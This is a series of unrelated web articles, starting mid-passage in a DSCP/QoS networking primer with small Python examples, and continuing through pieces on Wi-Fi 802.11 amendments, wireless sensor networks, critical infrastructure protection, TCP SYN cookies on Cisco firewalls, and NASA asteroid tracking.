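        raise ValueError("AF class is 1-4, drop precedence is 1-3")
    return (af_class << 3) | (drop_precedence << 1)

print(af_dscp(1, 1))       # 10 -> AF11, bulk data
print(af_dscp(2, 1))       # 18 -> AF21, transactional data
print(af_dscp(3, 1))       # 26 -> AF31, mission-critical data
print(af_dscp(3, 1) >> 3)  # 3  -> the class bits read back as IPP 3
```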
As you can see in the chart above, there are four main classes of data traffic, plus the default of Best-Effort.
Best effort traffic should be marked with DSCP 0. Adequate bandwidth should be assigned to the Best-Effort class as a whole because the majority of applications default to this class. It is recommended to reserve at least 25% for best effort traffic. In most networks there are hundreds, if not thousands, of applications that assign their IP packets to a default of DSCP 0. Consequently, adequate bandwidth needs to be provisioned to allow for the sheer volume of packets that will be placed in the default class. Examples of best-effort data applications:
- Noncritical traffic
- HTTP web traffic
Bulk Data are applications that are non-interactive and not drop sensitive. These are applications such as FTP, e-mail, back up operations, database synchronization and replication. These applications perform their tasks in the background. Bulk Data should have a moderate bandwidth guarantee but should be constrained from dominating a link.
Bulk Data should be marked as AF11, and excess bulk data can be marked down by a policer to AF12 or AF13. Examples of bulk data AF1 applications:
- Database synchronization
- Lotus Notes
- Microsoft Outlook
- POP 3
Transactional Data/Interactive Data
Transactional Data are client/server applications where the user normally waits for the transaction to happen in the foreground before proceeding on with the next action – as with database entry. This kind of client/server operation is different from applications such as e-mail where the processing of the email happens in the background and the user normally does not notice delays. Transactional data should have adequate bandwidth guarantee for interactive foreground operations that are supported.
Transactional data should be marked as AF21, and excess data can be marked down by a policer to AF22 or AF23. Examples of interactive AF2 applications
- Yahoo Instant Messenger
- Oracle Thin Client
Examples of transactional AF2 applications
- Microsoft SQL
- Oracle Database
Mission-Critical data is a locally defined class of traffic that is a non-technical, business critical class of transactional data. The majority of employees within the enterprise believe their traffic should receive premium class of service from the network. This issue can often become a politically charged debate over which traffic should be assigned to the premium class of traffic. It is recommended that as few applications as possible are assigned to this class of traffic. Mission Critical data should have adequate bandwidth guarantee for the interactive, foreground operations that it supports.
Mission Critical data should be placed in AF31, and excess data can be marked down by a policer to AF32 or AF33. As a note of interest, Cisco IP Telephony equipment (i.e., IP Phones) marked all call signaling traffic as AF31. With Communications Manager 4.0 and higher, call signaling is marked as CS3.
Expedited Forwarding – RFC 2598
EF PHB provides a low-loss, low-latency, low-jitter, and assured-bandwidth service. Applications such as VoIP, video, and other time-sensitive applications require a robust network treatment like EF. EF can be implemented using priority queuing along with rate limiting for these time-sensitive packets. EF should be used for only the most critical applications; if too much traffic is treated as EF, it is possible to oversubscribe the priority queue during congestion anyway.
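That combination, a strict-priority queue protected by a rate limiter so EF traffic cannot starve the other classes, is commonly built on a token bucket. The sketch below is illustrative (the rate and burst figures are arbitrary), not any vendor's implementation:

```python
class TokenBucket:
    """Minimal token-bucket policer: conforming packets pass, excess is dropped."""

    def __init__(self, rate_bytes_per_sec: float, burst_bytes: float):
        self.rate = rate_bytes_per_sec
        self.burst = burst_bytes
        self.tokens = burst_bytes  # bucket starts full
        self.last = 0.0

    def conforms(self, packet_bytes: int, now: float) -> bool:
        # Refill tokens for the elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if packet_bytes <= self.tokens:
            self.tokens -= packet_bytes
            return True
        return False  # an EF policer drops (rather than queues) excess traffic

bucket = TokenBucket(rate_bytes_per_sec=1000, burst_bytes=1500)
print(bucket.conforms(1500, now=0.0))  # True: within the initial burst
print(bucket.conforms(1500, now=0.1))  # False: only ~100 bytes of tokens refilled
print(bucket.conforms(1500, now=1.6))  # True: 1.5 s of refill restores the burst
```

Dropping rather than queuing the excess is what keeps the EF queue's latency and jitter bounded.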
Class Selector – RFC 2474
Class Selector (CS) is used to provide backward compatibility with IP Precedence. Just like IPP, CS has 0s in the 4th, 5th, and 6th bits of the TOS byte. For example, if you are sending packets to a router that only understands IPP markings, you could send CS-marked packets of 101000. This value is 40 as a DSCP but is interpreted as IPP 5 by the router that only understands IPP.
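The worked example in this paragraph checks out in code: a Class Selector value is just the IPP value shifted into the top three DSCP bits, so an IPP-only router recovers the precedence by reading those bits back.

```python
def cs_dscp(ipp: int) -> int:
    """Class Selector code point: IPP value in the top 3 bits, low 3 bits zero."""
    return ipp << 3

print(cs_dscp(5), format(cs_dscp(5), "06b"))  # 40 101000, as in the text
print(cs_dscp(5) >> 3)                        # 5: read back as IPP 5
```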
Subsequent posts in this series will look at the tool for implementing QoS and the command lines to build QoS on Cisco routers.
- End-To-End QoS network Design by Tim Szigeti and Christina Hattingh
- DiffServ – The Scalable End-To-End QoS Model
- Integrated Services Architecture
- Definition of the Differentiated Services Field
- An Architecture for Differentiated Services
- Requirements for IP Version 4 Routers
- An Expedited Forwarding PHB (Per-Hop Behavior)
Author: Paul Stryer
Mapping Preferences: A Harry Potter Topology
Clusters in a graph visualization are collections of closely related nodes that share many of the same links. Being able to easily see clusters is helpful for showing relationships. But clusters don't always stand out easily in a node-link graph, even when nodes are color-coded. Besides, many people are not familiar with the concept of a graph.
To better visualize graphs, a new algorithm, GMap, is being developed in Graphviz. It uses the geographic map metaphor, highlighting each cluster in a differently colored region (or country, to stay with the map metaphor). The borders between cluster countries are drawn halfway between nodes of neighboring clusters. Nodes within a country are much more closely related than nodes in bordering countries. Compared with node-link graphs, maps are much more familiar and intuitive to people.
Showing clusters on a map is also an interesting way to present lists of preferences, such as those maintained by Netflix or Amazon to suggest other selections based on common preferences. But sometimes a simple list of recommendations can seem odd or counterintuitive when the overlap between two selections isn't clear.
Visualizing and mapping recommendations can remove some of this mystery, showing how a recommendation is grouped with other choices. A map, much more than a simple list, can also lead a user's eye to other options and encourage the user to explore the landscape.
Desktop Virtualization for K-12 & Higher Education
Integrating technology into the classroom is an exciting endeavor that holds massive potential for students and teachers alike. Supporting BYOD and blended learning, combining in-person lessons with online lessons, providing chat and Web-enhanced lectures, and simply extending learning beyond the classroom into the Internet environment enable schools to deliver on their responsibility of giving students the confidence and skills to use and succeed with technology.
Achieving More with Less
Virtualization, a shared computing strategy that maximizes efficiency by harnessing the computing power of underutilized PCs, is an excellent way to bring classrooms and labs into the 21st century in a simple and cost-effective manner. Simply stated, virtualization allows you to achieve more with less by simplifying management, enabling blended learning and collaborative technology use, and facilitating incremental rollouts.
Key Benefits of Shared Computing
- Manages one virtual desktop OS for up to 100 end users, thereby reducing the number of operating systems to maintain by up to 97%.
- Reduces the per-seat cost of a PC by more than 75%.
- Integrates easily with your existing computing infrastructure, replacing costly PCs with simple, small and very durable thin clients.
- Centrally manages Internet filtering software, ensuring a consistent and safe Internet experience.
- Frees up valuable workspace in classrooms and labs.
- Produces less e-waste and uses less energy.
- Qualifies for monies from grants, E-Rate, Title I funding, municipal bonds, ESEA Flexibility and energy rebates.
Real World Success
More than 30,000 schools in 140 countries have already discovered the benefits of NComputing virtual desktop solutions in classrooms, computer labs, libraries, testing centers, media centers, administrative offices, teacher desks and for digital signage. | <urn:uuid:d6b19e89-cac3-42b7-82ec-9967129a2c64> | CC-MAIN-2017-04 | https://www.ncomputing.com/en/solutions/education | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00326-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.904748 | 379 | 2.671875 | 3 |
Telecom Architectures and Information Technologies
Discover the intricacies of a new era in telecommunications.
Telecom is undergoing a series of radical changes, molded by the legacy of
telephony and an Internet Protocol network. A new era in telecommunications has
exploded with the adoption of Wireless LAN, Unified Communications (UC), Voice
over IP (VoIP), 3G and 4G mobile networks, cloud computing, and the next
generation of voice and data services.
In this comprehensive course, you will gain an in-depth understanding of the
current telecom landscape and how voice has migrated from a circuit- to a
packet-switched network. You will learn how to evaluate existing technology
options to determine which will best meet your organization's data and telephony
requirements, from mature digital transport/access services to emerging voice
and data services using voice over packet technologies.
The technology, marketplace, and regulatory structure of telecommunications
are in a continuous state of transition. This powerful course will ensure that
you fully understand the service options available to your organization and how
voice technologies integrate into your existing data networks. | <urn:uuid:b94f6519-a80d-47e0-b561-0e731bfc1b7e> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/115798/telecom-architectures-and-information-technologies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00262-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.868907 | 230 | 2.953125 | 3 |
Even though users typically only notice the major changes designed to improve the performance of Wi-Fi, the 802.11 specifications are constantly under development. For every "public" change there are five background changes, some of which are significant.
With more than 20 802.11 specifications already ratified and many more in development, it makes sense to occasionally "roll up" the changes. Many of these protocols, after all, can overlap functionally and need extra attention to become interoperable. 802.11-2012 incorporates 10 recently ratified 802.11 amendments into an overall 802.11 spec, making it easier for engineers working with 802.11 to find what they need, to say nothing of the fact that it also helps alleviate interoperability issues between protocols.
Here are the 10 specs that are part of this roll-up, including the year they were ratified and a brief description of each:
* 802.11k: Radio Resource Measurement Enhancements (2008). Mainly used by AP manufacturers, this amendment makes additional radio and network information available to WLAN devices. This information is used to make real-time decisions about WLAN management, typically for better load balancing. [Also see: "Latest 802.11 standards: Too little too late?"]
The specification provides mechanisms for the AP or the central WLAN controller to offload users to another AP, even if the new AP has weaker signal strength than the impacted one. This could lead to signal strength and connectivity issues for WLAN users, so this needs to be considered when performing WLAN analysis of systems utilizing 802.11k.
WLAN systems designed for stadiums, auditoriums and large lecture halls will benefit from this specification. Usage in these settings is typically very dense, requiring careful WLAN bandwidth and user management, and 11k will provide the necessary data and control for managed WLAN equipment to handle these sporadically dense environments.
* 802.11n: Higher Throughput Improvements Using MIMO (September 2009). Just about everyone is familiar with 802.11n. The key technology introduced in this specification is MIMO (multiple input, multiple output), which allows for the simultaneous transmission of multiple unique data streams to significantly increase overall throughput.
802.11n is quickly becoming the de facto standard for commercially available WLAN equipment. The new technologies it introduced are very advanced, and it's unlikely that the full potential that 11n offers will be delivered to the market due to some practical limitations. However, the lessons learned from these limitations are quickly being addressed with new 802.11 specifications, most notably 802.11ac.
* 802.11p: WAVE -- Wireless Access for the Vehicular Environment (July 2010). 802.11p deals with data exchange between high-speed vehicles, and between vehicles and a yet-to-exist roadside WLAN infrastructure based on licensed spectrum in the 5.85-5.925GHz band. Activity in this area has been quite limited to date, as the overall implementation is complex, expensive and requires the appropriate business model if it's ever to see the light of day.
This specification provides a great example of how different specifications need to work in concert. Imagine driving down the freeway at 65 mph. Given the range of a typical access point is several hundred feet, your client will need to roam from one AP to the next every 5 seconds or so. The specific application of 11p can take advantage of certain techniques, like beamforming and increased power to perhaps extend the available range of each AP, but the amount of time spent connected to each AP will still be in the range of tens of seconds. [802.11p issues: "Will electronic toll systems become terrorist targets?"]
If a user is only going to be on an AP for approximately 15 seconds before being handed off to the next, the handoff time needs to be very short to provide a seamless user experience. Handoff is specifically addressed in 802.11r, also part of the 802.11-2012 roll-up, so it's imperative that the capabilities defined in both specifications be consistent and interoperable.
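The dwell-time arithmetic above is easy to check. The sketch below uses illustrative cell sizes (roughly 500 ft of coverage for a typical AP and 1,500 ft for an extended-range one); these figures are assumptions for the example, not values from the specification:

```python
def dwell_seconds(cell_diameter_ft, speed_mph):
    """Seconds a vehicle spends inside one AP's coverage area."""
    speed_fps = speed_mph * 5280 / 3600   # mph -> feet per second
    return cell_diameter_ft / speed_fps

# Typical AP, ~500 ft of coverage, at freeway speed:
print(round(dwell_seconds(500, 65), 1))    # ~5 seconds per AP
# Extended range (beamforming, higher power), ~1,500 ft:
print(round(dwell_seconds(1500, 65), 1))   # ~15 seconds per AP
```

At 65 mph (about 95 ft/s), even a tripled cell size only buys the client about 15 seconds per AP, which is why fast handoff matters so much here.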
* 802.11r: Fast BSS Transition (2008). As more amendments have been added to 802.11, the time it takes to make a "transition" or "handoff" when moving from AP to AP has degraded significantly, causing problems for services like voice over Wi-Fi (VoFi). This amendment addresses this degradation, returning the handoff process to the simple 4-message exchange as originally designed.
Technology based on 11r is already actively in use, and will become much more common in enterprise WLAN equipment. Even if customers aren't yet utilizing their WLAN for voice or video, they'll want to plan for the future as more and more client equipment (smartphones and tablets) are shipped ready for handoff from cellular networks to WLANs.
* 802.11s: Mesh Networking, Extended Service Set (July 2011). Mesh networking specifies an architecture and protocol to create self-configuring multi-hop wireless networks. These are typically high-performing, scalable, ad hoc networks, often with no wired access at all. Proprietary mesh technology has been in use for years, mainly in the public service/emergency management space where ad hoc local networks need to be set up in an area with little or no wired infrastructure -- basically temporary field networks. 802.11s will help tremendously in standardizing this technology, making it more interoperable and more accessible to wider business applications.
* 802.11u: Interworking with Non-802 Networks (February 2011). This is an extremely hot topic in mobile computing, and one that will continue to get tremendous attention. It also requires solutions to solve some pretty difficult practical problems, including discovery, authentication, authorization and compatibility, across multiple technologies and multiple service providers, hence the delivery of compatible products has been slower than anticipated.
Transition for data delivery is easier and is already fairly widespread. Most smartphones transition automatically from the cellular data network to an 802.11 network once users come into range of a network that has already been configured. Transitioning active telephone calls is much more complicated and much less common, but the need and the desire for products to do so is apparent and it is just a matter of time.
802.11u also provides key technology that enables the Wi-Fi Alliance Passpoint certification program (a.k.a. Hotspot 2.0). This program allows for the seamless transition of Wi-Fi clients between any hotspot AP that is certified to be Passpoint compliant, eliminating many of the complexities that exist today in discovering and connecting to both public and carrier-sponsored hot spots. Look for 802.11u- and Passpoint-compliant hardware to hit the market very soon. [Also see: "802.11u and Hotspot 2.0 promise Wi-Fi users a cellular-like experience"]
* 802.11v: Wireless Network Management (February 2011). 802.11v provides a mechanism for wireless clients to share information about the WLAN environment with each other and APs to improve WLAN network performance in real time. This specification is relatively new, and manufacturers are just beginning to take advantage of some of its features. As WLANs become even more heavily utilized, the benefits of 802.11v will certainly become obvious.
* 802.11w: Protected Management Frames (September 2009). 802.11w specifies methods to increase the security of 802.11 management frames. Management frames are 802.11 packets that control communication on the WLAN, but do not contain data. Currently, management frames are sent "in the clear." This makes them potentially vulnerable to malicious manipulation and can lead to a wide variety of WLAN attacks, from client spoofing (a rogue pretending to be an approved user) to hijacking of all data destined for one or more APs. 802.11w will significantly reduce these risks.
* 802.11y: 3650-3700MHz Operation in the U.S. (2008). 802.11y specifies a "light-licensing" scheme for U.S. users to take advantage of spectrum in the 3650-3700MHz band, at power levels that are significantly higher than those used in the 2.4GHz or 5GHz bands. The use case for this technology will typically be for longer distance, point-to-point, backhaul communication using 802.11, for example fixed point-to-point mobile links that may be required in a large-scale, temporary wireless network (like in an emergency situation), wireless interconnectivity between buildings in a campus setting, or links between islands of 802.11 hotspots in a municipal environment.
* 802.11z: Extensions to Direct Link Setup (September 2010). Direct link setup (DLS) allows WLAN client devices to connect directly to each other, bypassing the typical link through an infrastructure AP. This has many benefits, including an increase in speed (between the clients), an increase in network throughput (for all users), and an increase in overall service delivery, especially for multimedia (like a computer to DVR connection or a laptop to projector connection). [Also see: "Wi-Fi Alliance starts certifying tunnel technology for better wireless performance"]
The Wi-Fi Alliance (WFA) already has a program in place called Wi-Fi Direct that addresses this functionality, and most commercial devices are being certified under this program. 802.11z standardizes this behavior, making it easier for equipment designers to ensure their products can deliver popular features like Wi-Fi Direct.
The recently ratified 802.11-2012 specification is most certainly a wide-ranging roll-up. From generic and already prolific technology like 802.11n to highly specific technology like 802.11y, this new specification integrates all current Wi-Fi technology into a single specification again, making it easier for developers and testers to find all the information they need in a single document. And although the ratification of such a specification may seem trivial to end users of this technology, they will also benefit, both from tighter feature integration as well as faster time to market for interoperable 802.11 devices.
WildPackets develops hardware and software solutions that drive network performance, enabling organizations of all sizes to analyze, troubleshoot, optimize and secure their wired and wireless networks. Customers include Boeing, Chrysler, Motorola, Nationwide, and over 80 percent of the Fortune 1000. WildPackets is a Cisco Technical Development Partner (CTDP). For more information, visit www.wildpackets.com. | <urn:uuid:a8d9f483-accf-4df1-9e42-3d8e0f935ec0> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2161855/tech-primers/rolling-up-developments-in-wi-fi.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00410-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934742 | 2,165 | 2.96875 | 3 |
Meanwhile, the discussion also turned to the benefits of functional programming versus imperative programming. Functional programming is a programming paradigm that treats computation as the evaluation of mathematical functions and avoids state and mutable data. It emphasizes the application of functions, in contrast to the imperative programming style, which emphasizes changes in state. The difference between a mathematical function and the notion of a "function" used in imperative programming is that imperative functions can have side effects, changing the value of program state. A key tenet of functional programming is the concept of immutability. In functional programming, an immutable object is an object whose state cannot be modified after it is created.
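A minimal Python sketch of the contrast described above (the bank-balance example is purely illustrative):

```python
# Imperative style: the function has a side effect -- it mutates shared state.
totals = {"balance": 100}

def deposit(amount):
    totals["balance"] += amount        # changes program state in place

# Functional style: output depends only on the inputs; nothing is mutated.
def deposited(balance, amount):
    return balance + amount

# Immutability: a tuple's state cannot be modified after it is created,
# so an "update" produces a new object instead of altering the old one.
point = (2, 3)
moved = (point[0] + 1, point[1])       # point itself is unchanged
```

Calling `deposit(25)` twice leaves the program in different states each time, while `deposited(100, 25)` always returns 125 for the same inputs -- the property that makes functional code easier to reason about and test.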
Wireless Sensor Networks: Structure and Protocol
A problem with any discussion around wireless sensor networks is that—like so many other bleeding-edge technologies—few people can say with certainty what they really are. Of course, this doesn’t mean people will be discouraged from attempting to use them. In fact, for many of the experts who work with wireless, this is a very exciting stage of development, one rife with opportunities for innovation.
“Currently, wireless sensor networks are generally considered to be at their infancy,” said Seapahn Megerian, a specialist in networked embedded systems and assistant professor in the Electrical and Computer Engineering Department at the University of Wisconsin in Madison. “This means that although you are not very likely to see them being used around you right now, there is a very strong impetus in terms of academic research and industrial support that will undoubtedly change this in the near future. The beauty of forward-looking academic research in a new area such as this is that you are typically not constrained by existing standards and guiding entities. But on the down side, this leads to contributions and results that often cannot be made to coexist without significant efforts. I would say a large number of the challenges now—both in academia as well as industry—deal with trying to come to a consensus on what a ‘sensor network’ is and what the applications are.”
A rough explanation of the structure of wireless sensor networks would simply be an arrangement of RF transceivers, sensors, machine controllers, microcontrollers and user interface devices that communicate with each other via two or more nodes. However, this description leaves something to be desired and doesn’t really explain how these interrelate, nor could it. “Wireless sensor networks define a truly vast multidisciplinary domain that encompasses technologies starting from the physics and device levels to circuits, embedded processors, storage, wireless communication, networking, system integration, middleware, operating systems, security and application software. Consequently, a large number of guiding entities can potentially come in play when all of these components are brought together to form a functioning system,” Megerian said.
Likewise, it’s not easy to pin down universal protocols and best practices for wireless sensor networks. In this way, this sphere is similar to wireless technology in general. “There are a number of existing standards, new and emerging standards, and guiding principles for each of the components that make up sensor networks.” Megerian explained. “Many of these areas are quite mature and have been studied in-depth in the past decades. At the same time, there are also a number of newer general principles that have started to guide the research in the area of sensor networks. Various consortia are emerging to try to bring some order, but exactly how this will evolve in the future is unclear.”
Two of the main identified problems with the operation of wireless sensor networks, Megerian said, are the energy constraints of the nodes and the unpredictability of the nodes and their wireless links. Generally, these nodes, which can number in the thousands, are battery-operated. Because they often monitor austere and inaccessible locations and there are so many of them, the people using them today have to adopt a kind of “spray-and-pray” approach. “Generally, we do not assume that individual sensor nodes will be reliable. Thus, the common algorithms and protocols of sensor networks often have features to automatically recover from node failures, either due to energy exhaustion, hardware failures or other unforeseen events. Furthermore, the performance of the wireless communication links between the sensor nodes may be quite unpredictable. This adds another dimension of uncertainty in how we design, maintain, troubleshoot and fix wireless sensor networks.”
Megerian used a somewhat transcendental description to explain wireless sensor networks and their (for now) latent capabilities. “I think it helps to think of wireless sensor networks as the missing link between our informational (computational) worlds and our physical reality,” he said. “Sensor networks enable us to see and learn things in our daily environments in ways and at granularities that have never been possible before. Virtually all scientific branches can now have access to the kinds of data that are fundamental in making significant experimental advances in our understanding of the world. These advances will then undoubtedly lead to further, and potentially profound, theoretical advances, much like we have seen in the past: the synergy between experimental and theoretical progress and how one almost always seems to feed off of the other.
“But along with this newfound power to observe come a number of pitfalls that will definitely need to be addressed,” he added. “First and foremost, privacy issues stand out any time sensors are placed in any way that can observe human activities. Furthermore, security and protection of the information presents a number of non-trivial challenges. Sensor nodes in such system are, by design, exposed to a wide array of elements that can include eavesdroppers, malicious attackers and hackers.”
But will there ever be a substantial market for wireless sensor networks? In Megerian’s opinion, almost certainly yes. The watchword for this sector is “potential,” he said. The applications of these systems in the future could include monitoring of houses and offices, observation of the environment for advanced warnings of natural disasters, military surveillance and even exploration of the planets and moons in our solar system. “Basically, with sensor networks, the technologies have been advancing at a much faster pace than the applications and the potential users have. So given time, it seems quite likely that the applications (and the potential users) will catch up and wireless sensor networks will find their way in all sorts of public, consumer, commercial and other environments.”
–Brian Summerfield
Business Process Analysis, also known as Business Process Mapping, is a systematic way of representing tasks, activities, procedures, employees, timeframes, inputs, and outputs associated with a specific business process in a flowchart-style diagram. Fundamentally, it offers a graphical representation of how an organization's processes operate. This template will assist in the gathering of information during the initial phases of the BPA process. | <urn:uuid:b5608acf-05a5-4f62-8515-868bb75e1b26> | CC-MAIN-2017-04 | https://www.infotech.com/research/process-profile-template | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00281-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90229 | 105 | 2.6875 | 3 |
Apart from one another, information technology (IT) and operational technology (OT) are two separate entities that perform different functions. But together, they make up the backbone of a nation’s security and economic stability—both in the private and public sectors. Governments, utility companies and transportation departments must ensure, at all costs, that critical infrastructure protection is not compromised. And this means that several challenges must be addressed.
According to the U.S. Department of Homeland Security, critical infrastructure is comprised of the networks, systems and assets—both virtual and physical—that are so vital that their incapacitation would compromise security, health and safety. There are a lot of challenges involved in the maintenance of such infrastructure; so with so much at stake, providers must protect both IT and OT systems to develop a robust critical infrastructure protection solution.
One of the main differences between IT and OT infrastructure is that IT systems can be replaced. A server or PC, for instance, can be easily fixed or replaced and likely will not pose a threat to human life if destroyed. But when OT systems are compromised, the effects can be devastating. This is because OT infrastructure manages systems such as power grids and gas lines. It is the difference between a loss of information and potential loss of life. And it is often the difference between a common technology mishap and a potential attack from paramilitary threats, foreign governments or terrorist organizations.
Preventing the collapse of critical infrastructure is therefore paramount. Attacks from adversaries both known and unknown remain the principal threat to operational safety. Thus, the North American Electric Reliability Corporation (NERC) provides strict guidelines for compliance. Aside from the physical risks associated with compliance failures, organizations that do not adhere to the guidelines can face penalties of up to $1 million per day.
NERC compliance involves a complete facility assessment, and mandates that each organization develop and maintain a list of critical cyber assets (CCA) that are essential to that facility’s main operation. Further, Critical Infrastructure Protection (CIP) standards are designed to ensure that each network is segmented for the purpose of isolating attacks to individual sectors in hopes of preventing its spread.
Further challenges associated with NERC compliance include mandatory password changes, including random-character generation and the issuance of digital certificates to computers, servers and mobile devices. This is for the purpose of ensuring that only authorized devices can connect to a network. While past solutions such as personal identification numbers (PIN) and biometrics have been utilized, these are now only preliminary security measures and must be backed up with digital certificates to verify employee credentials. Strong authentication of the individual identity accessing operation and information systems is crucial, including remote, physical and logical access.
Many students who have either taken training classes on the Cisco PIX or ASA security appliances or read associated published material are already acquainted with the phrase “TCP SYN cookie”. This post will serve to explain some of the historical background, as well as the numerous hardware implementations.
The TCP SYN Flood denial-of-service attack is now more than fifteen years old. Kevin Mitnick used it as part of the now-famous coordinated attack against Tsutomu Shimomura, the security researcher who later helped track him down. A little more than five years later, SYN floods played a part in the Distributed Denial of Service (DDoS) attacks that brought down Yahoo, eBay, CNN, and others. Now SYN flood scripts and executables are freely available for download.
An early Cisco IOS® Firewall implementation utilized a feature known as TCP Intercept which could be operated in either monitor or intercept modes. These would either report excessive TCP SYN activity via syslog, or prevent it entirely. The drawback of this approach was its use of a memory-resident TCP state table, which, during peak periods of flooding, could result in depleted router resources. So while attackers might be thwarted in their efforts to bring down servers, they might bring down the router instead!
In the mid-1990s a variety of proposals were put forth in an attempt to provide a more effective TCP SYN flood defense mechanism. Among these is the TCP SYN Cookie mechanism offered by Daniel J. Bernstein, which works as follows.

The TCB (Transmission Control Block) is a data structure which holds the connection state information and can be several hundred bytes in size, depending on the implementation in the operating system. What the SYN Cookie mechanism does is encode the information that would normally be kept in the memory-resident TCB into the Initial Sequence Number (the "cookie") returned in the SYN-ACK.

The acknowledgement (ACK) from the initiator (or client) echoes this sequence number plus one; the listener (or server) can decrement it by one to recover the cookie and confirm the state information for this client. Note that this encoding scheme allows the listener to avoid holding any connection state table at all until the handshake completes -- the TCB is, in effect, discarded and later reconstructed from the cookie.
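A toy Python sketch of the idea follows. This is not Bernstein's exact bit layout or any production implementation -- the secret key, the 64-second time counter, and the small MSS table are all illustrative assumptions -- but it shows how a server can validate a handshake with no stored per-connection state:

```python
import hashlib
import hmac
import struct
import time

SECRET = b"per-boot-random-secret"     # assumption: a random key chosen at boot
MSS_TABLE = [536, 1300, 1440, 1460]    # the few MSS values the cookie can encode

def _mac24(src, sport, dst, dport, t):
    """24-bit keyed hash over the connection 4-tuple and time counter."""
    msg = struct.pack("!IHIHI", src, sport, dst, dport, t)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")

def make_cookie(src, sport, dst, dport, mss, now=None):
    """Build the ISN for the SYN-ACK: 5 bits of time, 3 bits of MSS, 24-bit MAC."""
    t = int(now if now is not None else time.time()) >> 6   # 64-second granularity
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    return ((t & 0x1F) << 27) | (mss_idx << 24) | _mac24(src, sport, dst, dport, t)

def check_cookie(src, sport, dst, dport, ack, now=None):
    """Validate the client's ACK (= cookie + 1); return the encoded MSS or None."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t_now = int(now if now is not None else time.time()) >> 6
    t_bits, mss_idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    for t in (t_now, t_now - 1):       # tolerate one counter tick of skew
        if (t & 0x1F) == t_bits and _mac24(src, sport, dst, dport, t) == mac:
            return MSS_TABLE[mss_idx]  # state recovered; no TCB was ever stored
    return None
```

The listener allocates no per-connection state until `check_cookie` succeeds, which is exactly what lets it ride out a flood of spoofed SYNs that never complete the handshake.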
TCP SYN Cookies are not only available on the ASA and PIX firewalls (first introduced in PIX OS 6.2), but also on the 12000 series routers supporting the Cisco IOS XR software as well as the Application Control Engine (ACE) 4700 series. | <urn:uuid:467d1461-3391-4d0f-ae15-7ea7c2f68895> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2010/12/20/implementing-tcp-syn-cookies-on-cisco-hardware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280128.70/warc/CC-MAIN-20170116095120-00521-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952289 | 521 | 2.625 | 3 |
There has been much chatter about the threat of an asteroid or significant meteor strike on Earth in the past few weeks - mostly caused by the untracked meteor that blasted its way to international attention when it exploded in the sky above Russia in February, injuring nearly 1,200 people.
It was one of those amazing coincidences that on that same day an asteroid NASA had been tracking for months -- asteroid 2012 DA14 -- was to harmlessly cross Earth's path.
[RELATED: The sizzling world of asteroids]
The events of that day in particular play up the difficulty of tracking such objects. They also raised the question of how much is gained by spending large sums and developing new technologies to track them.
Those events and the topic of mitigating asteroid, meteor and other Near Earth Object (NEO) threats to Earth prompted a couple of congressional hearings by the Committee on Science, Space, and Technology, the latest of which was held this week.
"Because it was found a year in advance, we were able to accurately predict the close Earth passage of asteroid 2012 DA14 on February 15, and we knew that it would not hit the Earth. However, the small asteroid that impacted the Earth's atmosphere over Russia arrived unannounced because it came from the direction of the Sun, and was hence unobservable with Earth-based telescopes. Discovering and identifying relatively small Earth impactors among the millions of asteroids in the Earth's neighborhood represents a significant challenge. Because there are so many more smaller asteroids than larger ones, the smaller ones hit the Earth's atmosphere more frequently. There are about ten million 20-meter sized asteroids like the one that exploded over central Russia two months ago, and their frequency of collision with the Earth is about once every 100 years, on average," Donald Yeomans, manager of the Near-Earth Object Program Office at NASA's Jet Propulsion Laboratory.
Yeomans went on to say that the NASA-supported NEO observations program is proceeding extremely well, and the rate with which NEOs are being discovered and physically characterized is increasing each year.
"[In] 2007, about 80% of the NEOs one kilometer or larger had been discovered and only a few percent of the smaller 140 meter objects. Today, the Spaceguard goal of discovering 90% of the large NEOs has been exceeded and about 25% of the 140 meter or larger sized NEO population has been discovered. Today, the discovery rate of NEOs is about 1000 per year, up 50% since 2007. The Minor Planet Center in Cambridge, Massachusetts, has 100 million observations of NEOs in its database and 27,000 observations are added daily. Fully 96% of all NEOs were discovered by NASA-funded surveys," he stated. Still there is still much work to be done. About 50-100 NEOs larger than one kilometer remain undiscovered, along with about 13,000 NEOs larger than 140 meters and millions of objects larger than about 30 meters in extent - the approximate minimum size for a common stony asteroid to cause significant ground damage.
"None of the NEOs found to date have more than a tiny chance of hitting Earth in the next century. Thus the near-term risk of an unwarned impact from large asteroids, and hence the majority of the risk from all NEOs, has been reduced by more than 90%. Assuming none are found to be an impact threat, discovering 90% of the 140 meter sized objects will further reduce the total risk to the 99% level. By finding these objects early enough and tracking their motions over the next 100 years, even those rare objects that might be found threatening could be deflected using existing technologies. For example, a spacecraft could purposely ram the asteroid, modifying its orbital velocity by a very small amount, so that over several years its trajectory would be modified and its predicted impact of Earth in the future avoided by a safe margin," Yeomans said.
There are viable options for accelerating the current NEO search efficiencies either using next-generation, ground-based optical surveys or the even more efficient space-based infrared surveys.
Yeomans detailed some future technologies that will help with space objection identification.
